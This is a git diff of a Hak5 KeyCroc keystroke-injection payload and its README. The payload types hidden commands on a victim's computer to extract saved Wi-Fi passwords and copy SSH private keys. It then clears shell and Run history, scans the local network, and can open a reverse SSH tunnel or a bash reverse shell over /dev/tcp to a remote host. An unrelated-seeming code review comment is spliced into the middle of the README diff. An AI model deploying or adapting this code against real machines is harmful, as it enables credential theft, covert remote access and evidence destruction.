diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
index 64009c0..c80cb60 100644
--- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
+++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
@@ -1,118 +1,468 @@ # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point -# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt +# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 3.5 +# Version: 4.3 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro -MATCH (getonline_W|getonline_R|getonline_L) +# getonline_W <-- MATCH word for windows, Attempt connection to access point +# getonline_L <-- MATCH word for Linux, Attempt connection to access point +# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point +# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD ) +# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID +# getonline_K <-- MATCH word for killing keycroc wlan0 interface +# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE +# getonline_H <-- MATCH word for entering ATTACKMODE HID +# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL +# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET +# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot +# getonline_T <-- MATCH word for Stopping ICMP/PORT alert -CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) -for dir in "${CROC_POT_DIR[@]}"; do [[ ! 
-d "$dir" ]] && mkdir "$dir" || LED B; done +# option=0 Run payload as normal +# option=1 Run payload as normal, open terminal on target +# option=2 Run payload as normal, start reverse SSH tunnel using SSH +# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT +# option=4 Run payload as normal, open web page -wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt +MATCH getonline+_[A-Z]{1} +QUACK LOCK -if [ -f $wifi_pass ]; then - cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt - rm -f $wifi_pass +#---> Edit payload option below +option=0 +keycroc_password=hak5croc +wifi_pass=/tools/wifipass.txt +web_page=https://forums.hak5.org/ + +#---> Edit remote host below +remote_user_name=EDIT_REMOTE_USERNAME_HERE +remote_host_ip=EDIT_REMOTE_HOST_IP_HERE +remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE +port=7000 + +#---> Edit known SSID and password below +known_ssid=EDIT_KNOWN_SSID_HERE +known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE + +#---> Edit recon scan on/off below & nmap +recon=off +nmap_scan="nmap -T4 -F" +recon_loot=/root/udisk/tools/Target_SSID.txt + +#---> Edit ICMP/PORT alert on/off below & iptables time out +alert=off +alert_time=60 + +#---> Edit target password below +if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) +else + target_password=ENTER_TARGET_PASSWORD_HERE fi -ATTACKMODE HID STORAGE -Q DELAY 5000 -LED ATTACK +recon_scan() { + if [ "$recon" = "on" ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" + 
QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi + elif [ "$recon" = "off" ]; then + : + else + : + fi +} + +ENTER_STORAGE() { + if [ -f ~/udisk$wifi_pass ]; then + cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt + rm -f ~/udisk$wifi_pass + fi + ATTACKMODE HID STORAGE + QUACK DELAY 5000 + LED ATTACK +} + +RESET_PAYLOAD() { + QUACK UNLOCK + sleep 5 ; LED OFF + killall -9 bash + killall -9 python + sleep 1 + RELOAD_PAYLOADS +} + +CLEAN_UP() { + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "history -c ; rm -f ~/.bash_history" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi +} + +calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. 
read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" +} case $LOOT in getonline_W) - Q GUI r - Q DELAY 3000 - Q STRING "powershell -NoP -NonI -W Hidden" - Q ENTER - Q DELAY 5000 - Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" - Q ENTER - Q DELAY 3000 - Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" - Q ENTER - Q DELAY 2000 - Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" - Q ENTER - Q DELAY 2000 - Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" - Q ENTER - Q DELAY 5000 - Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK GUI r + QUACK DELAY 3000 + QUACK STRING "powershell -NoP -NonI -W Hidden" + QUACK ENTER + QUACK DELAY 5000 + QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" + QUACK ENTER + QUACK DELAY 3000 + QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\"" + QUACK ENTER + 
QUACK DELAY 5000 + recon_scan + CLEAN_UP + QUACK STRING "exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_R) - Q CONTROL-ALT-d - Q CONTROL-ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "umount \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_L) - if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then - PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$target_password" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + 
QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "sudo umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID +;; + getonline_N) + LED B + sleep 2 + echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass +;; + getonline_F) + if [ -f ~/udisk$wifi_pass ]; then + LED B + sleep 2 else - PC_PW=LINUX + LED R + RESET_PAYLOAD fi - Q CONTROL-ALT-d - Q ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" - Q ENTER - Q DELAY 2000 - Q STRING "$PC_PW" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "sudo umount \$MOUNT_POINT ; exit" - Q ENTER +;; + getonline_K) + LED R + ifconfig wlan0 down + RESET_PAYLOAD +;; + getonline_S) + ATTACKMODE HID STORAGE + sleep 3 + RESET_PAYLOAD +;; + getonline_H) + ATTACKMODE HID + sleep 3 + RESET_PAYLOAD +;; + getonline_P) + ATTACKMODE HID SERIAL + sleep 3 + RESET_PAYLOAD +;; + getonline_A) + ATTACKMODE HID AUTO_ETHERNET + sleep 3 + RESET_PAYLOAD +;; + getonline_X) + LED R + rm -f /root/udisk/payloads/Croc_getonline.txt + rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt + rm -f $recon_loot root/udisk/config.txt + rm -f /root/udisk/tools/firewall-rules-backup.txt + rm -r /root/udisk/tools/Target_SSH_KEY + apt -y remove sshpass + reboot --force + RESET_PAYLOAD +;; + getonline_T) + if ps -p "$(sed -n 1p 
/tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/port_pid.txt)" + fi + if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)" + fi + killall -9 tcpdump + sleep 1 + else + : + fi + RESET_PAYLOAD +;; + *) + LED R + sleep 1 + LED OFF + RESET_PAYLOAD ;; esac - -ATTACKMODE HID sleep 3 -LED SETUP -kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) +word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w) +if [[ $word_count -eq 2 ]]; then + ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)" + matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')" + sleep 1 + if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then + LED SETUP + else + LED R + RESET_PAYLOAD + fi +else + LED R + RESET_PAYLOAD +fi + +kill -9 $(pidof wpa_supplicant) +kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then - sed -i '0,/./s/^.//' $wifi_pass - sed -i 's/\r//g' $wifi_pass + sed -i '0,/./s/^.//' ~/udisk$wifi_pass + sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass + sed -i 's/\r//g' ~/udisk$wifi_pass fi -sed -i 's/\( \)*/\1/g' $wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt -wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf +sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass +sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt +wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf + ifconfig wlan0 up -wpa_supplicant -B -D nl80211 
-iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 +wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf +dhclient wlan0 sleep 3 systemctl restart ssh.service -[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R +if : >/dev/tcp/8.8.8.8/53; then + if [ $option -eq 0 ]; then + : + elif [ $option -eq 1 ]; then + case "$LOOT" in + getonline_W) + QUACK GUI m + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 5000 + ;; + getonline_R) + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + ;; + getonline_L) + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + ;; + esac + QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$keycroc_password" + QUACK ENTER + elif [ $option -eq 2 ]; then + status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" + [ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass + sleep 1 + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa + sleep 1 + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 3 + ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip + else + LED R + sleep 1 + fi + elif [ $option -eq 3 ]; then + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + /bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 & + else + LED R + sleep 1 + fi + elif [ $option -eq 4 ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK GUI d + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Start-Process $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_R" 
]; then + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_L" ]; then + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + fi + else + LED FINISH + fi + LED FINISH +else + LED R +fi + +if [ "$recon" = "on" ]; then + LED C SLOW + echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot + ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass) + iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot + echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot + ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot + cat /etc/resolv.conf | grep nameserver >> $recon_loot + + perform_nmap_scan() { + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot + $nmap_scan $network_range >> $recon_loot + } + calculate_network_range + perform_nmap_scan + + echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot + curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot + echo -ne "\n\n" >> $recon_loot +elif [ "$recon" = "off" ]; then + : +else + : +fi + +if [ "$alert" = "on" ]; then + icmp_alert() { + calculate_network_range + sleep 1 + until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do + : + done + LED R SLOW + iptables -F + iptables -A OUTPUT -p icmp --icmp-type any -j DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; 
LED OFF + icmp_alert & echo -ne $! > /tmp/icmp_pid.txt + } + port_alert() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + file=/tmp/tcpdump.out + until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do + : + done + LED R SLOW + iptables -F + iptables -P INPUT DROP + iptables -P OUTPUT DROP + iptables -P FORWARD DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; LED OFF + port_alert & echo -ne $! > /tmp/port_pid.txt + } + iptables-save > /root/udisk/tools/firewall-rules-backup.txt + icmp_alert & echo -ne $! > /tmp/icmp_pid.txt + port_alert & echo -ne $! > /tmp/port_pid.txt + LED B +elif [ "$alert" = "off" ]; then + : +else + : +fi + sleep 3 LED OFF +QUACK UNLOCK diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 17db8c2..7153625 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md +++ b/payloads/library/credentials/Croc_Getonline/README.md @@ -1,8 +1,9 @@ # Croc_Getonline ## INTRODUCTION : - - This project is developed for the HAK5 KeyCroc - - Attempt to connect Keycroc automatically to target wifi access point. + - This project is developed for the HAK5 KeyCroc. + - Attempt to connect Keycroc automatically to target wifi access point. OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel. + - Payload will use KeyCroc MATCH command to perform specific tasks. * **TESTED ON** - Windows 10 
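Review bot: The SSID-in-range check after the `case` block cannot fail when the SSID is absent from the scan, because an empty `matched_ssid` turns `[[ "$ssid_to_match" =~ "$matched_ssid" ]]` into an empty-pattern match that always succeeds, while several BSS entries advertising the same SSID (multiple `SSID:` lines joined by newlines) make the same test fail and trigger `RESET_PAYLOAD`. The SSID is also interpolated into an ERE by `grep -Ewi "SSID: $ssid_to_match"`, so names containing `(`, `+` or `.` mis-match or error out; I would write `matched_ssid="$(iw dev wlan0 scan | grep -Fw -- "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"` and `if [[ -n "$matched_ssid" ]] && grep -qFx -- "$ssid_to_match" <<<"$matched_ssid"; then`. Separately, the header comment and README describe `recon=on` as Nmap/iw/curl collection, but `recon_scan` also copies the target user's whole `~/.ssh` directory (private keys included) into `tools/Target_SSH_KEY`; add `# recon=on also copies the target's ~/.ssh directory to tools/Target_SSH_KEY` next to the `recon=` setting so operators know what is being exfiltrated. Note too that `old_wifipass.txt`, the recon loot and `firewall-rules-backup.txt` all sit on the same udisk volume the target mounts during `ATTACKMODE HID STORAGE`, so previously harvested credentials are readable from the target host while the payload runs.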
@@ -12,29 +13,99 @@ ## INSTALLATION : - Enter arming mode on your keycroc to install file. - - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder** + - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**. -## STARTING GETONLINE : +## STARTING CROC_GETONLINE : - - After install plug into target and type in anywhere - - **getonline_W** <-- MATCH word for windows - - **getonline_L** <-- MATCH word for Linux - - **getonline_R** <-- MATCH word for Raspberry pi - - When the payload is done running the LED will light up green - - Keycroc should now be connected to target wifi access point - - NOTE: for linux edit payload for passwd needed for sudo permission +After install plug into target and type in anywhere: + - **`getonline_W`** MATCH word for windows, Attempt connection to wifi access point + - **`getonline_L`** MATCH word for Linux, Attempt connection to wifi access point + - **`getonline_R`** MATCH word for Raspberry pi, Attempt connection to wifi access point + - **`getonline_N`** MATCH word for connecting to known SSID ( EDIT PAYLOAD ) + - **`getonline_F`** MATCH word for reset wlan0 interface to last known SSID + - **`getonline_K`** MATCH word for killing keycroc wlan0 interface + - **`getonline_S`** MATCH word for entering ATTACKMODE HID STORAGE + - **`getonline_H`** MATCH word for entering ATTACKMODE HID + - **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL + - **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET + - **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot + - **`getonline_T`** MATCH word for Stopping ICMP/PORT alert + +* **LED STATUS** + - **`LED WHITE`** Entering ATTACKMODE + - **`LED ATTACK`** Retrieving wifi access point credentials + - **`LED SETUP`** Configuring keycroc wlan0 interface to wifi access point + - **`LED GREEN`** Successful connection to wifi access point + - **`LED RED`** Payload failed + - 
**`LED CYAN`** Performing recon scan + - **`LED RED FLASH`** ICMP/PORT alert + +**NOTE:** for linux edit payload for password needed for sudo permission. + +## PAYLOAD OPTIONS : + +Editing payload variable options: +- **`option=0`** + + - This option will run payload as normal, attempt to connect Keycroc to wifi access point. + +- **`option=1`** + + - This option will run payload as normal, after a successful connection open terminal on target and start ssh session. + - ( EDIT PAYLOAD FOR KEYCROC PASSWORD ) + +- **`option=2`** + + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. + - ( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) + - SSHPASS is a requirement for this option, payload will attempt to install if not installed. + +- **`option=3`** + + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. + - ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) + +- **`option=4`** + + - This option will run payload as normal, after a successful connection open default browser and start web page. + - ( EDIT PAYLOAD FOR WEB SITE DEFAULT https://forums.hak5.org ) + +* **Configuring RECON scan with recon=on and recon=off** + +The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. + +- **`recon=off`** + + - Suppresses active reconnaissance to maintain stealth. + - Useful for discreet scanning in sensitive environments. + +- **`recon=on`** + + - Initiates basic network reconnaissance scans. + - Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt. 
+ +* **Configuring ICMP and Port Alerts with alert=on and alert=off** + +- **`alert=on`** + + - ICMP Alert: It blocks outgoing ICMP and UDP packets with specific destination ports (33434 and 33534) for a minute and then restores the original firewall rules. + - Port Alert: It drops incoming TCP packets with the SYN flag set for a minute and then restores the original firewall rules. + +- **`alert=off`** + + - If alert is set to off, the script does nothing ( : represents a null command in bash ). No alerts are set up. + +To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions, respectively. It saves the current firewall rules to a backup file and runs the alert functions in the background, storing their respective PIDs in temporary files. If alert=off, the script does nothing related to alerts. ## PAYLOAD INFO : -**PowerShell script that performs the following actions:** +- **PowerShell script that performs the following actions:** Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet. Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet. +Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT and exits the script. -Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT. 
-Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script. - -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc. Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID. @@ -42,7 +113,7 @@ Gets the password for the current wireless network by searching for the SSID in Writes the SSID and password to a file located at $MOUNT_POINT using tee. Unmounts the volume at $MOUNT_POINT using umount, and exits the script. -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb. Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist. 
@@ -54,24 +125,24 @@ Unmounts the volume at $MOUNT_POINT using umount, and exits the script. Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc". -**-Sed command that performs the following actions:** +- **Sed command that performs the following actions:** By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus: -1{x;s#^#sed -n 1p wifipass.txt#e;x} +- 1{x;s#^#sed -n 1p wifipass.txt#e;x} -1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s +1{..} executes the commands between the ellipses on the first line of wifipass.txt. Commands are separated by ;'s x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space. s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only. x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space. -10{G;s/\n(\S+).*/ \1/} +- 10{G;s/\n(\S+).*/ \1/} 10{..} executes the commands between the ellipses on the tenth line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column. 
